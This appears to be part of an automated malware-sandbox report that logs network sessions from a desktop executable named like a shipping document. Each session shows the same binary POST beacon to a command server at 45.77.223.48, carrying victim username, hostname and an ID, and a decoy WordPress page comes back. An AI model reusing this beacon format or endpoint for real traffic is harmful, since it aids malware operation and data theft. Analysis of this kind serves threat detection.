Apr 25, 2024 09:43:04.035270929 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:43:04.162424088 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:43:04.977320910 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:43:04 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:43:04.977344990 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:43:04.977471113 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:43:04.986962080 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:43:04.987298012 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:43:04.987370014 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:43:04.987467051 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:43:04.987651110 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:43:04.987700939 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:43:04.987760067 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	49802	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:43:05.247701883 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:43:05.373589993 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:43:06.233783960 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:43:05 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:43:06.234366894 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:43:06.234379053 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:43:06.244445086 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:43:06.244833946 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:43:06.244973898 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:43:06.245279074 CEST	1289	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0
Apr 25, 2024 09:43:06.245290995 CEST	1289	IN	Data Raw: 22 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 32 30 30 62 5c 75 64 62 34 30 5c Data Ascii: ","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undef
Apr 25, 2024 09:43:06.245495081 CEST	1289	IN	Data Raw: 53 74 72 69 6e 67 28 29 5d 2e 6a 6f 69 6e 28 22 2c 22 29 2b 22 29 29 3b 22 2c 72 3d 6e 65 77 20 42 6c 6f 62 28 5b 65 5d 2c 7b 74 79 70 65 3a 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 7d 29 2c 61 3d 6e 65 77 20 57 6f 72 6b 65 72 28 55 52 Data Ascii: String()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(funct
Apr 25, 2024 09:43:06.245506048 CEST	1289	IN	Data Raw: 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 20 73 76 67 7b 68 65 69 67 68 74 3a 31 65 6d 3b 77 69 64 74 68 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61 Data Ascii: al-links .wp-social-link svg{height:1em;width:1em}.wp-block-social-links .wp-social-link span:not(.screen-reader-text){font-size:.65em;margin-left:.5em;margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-socia

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	49803	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:43:06.504867077 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:43:06.632006884 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:43:07.502393961 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:43:06 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:43:07.502492905 CEST	141	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:43:07.511431932 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:43:07.511869907 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:43:07.511919975 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:43:07.512092113 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:43:07.512553930 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:43:07.512587070 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:43:07.512625933 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
Apr 25, 2024 09:43:07.512667894 CEST	1289	IN	Data Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	49804	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:43:07.780738115 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:43:07.911998987 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:43:08.720006943 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:43:07 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:43:08.720118046 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:43:08.720381975 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:43:08.729425907 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:43:08.729669094 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:43:08.729809999 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:43:08.729911089 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:43:08.730053902 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:43:08.730076075 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:43:08.730185986 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	49805	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:43:08.999268055 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:43:09.130069971 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:43:09.948549986 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:43:09 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:43:09.948570967 CEST	70	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" />
Apr 25, 2024 09:43:09.948667049 CEST	71	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:43:09.956132889 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:43:09.956583023 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:43:09.956681013 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:43:09.956821918 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
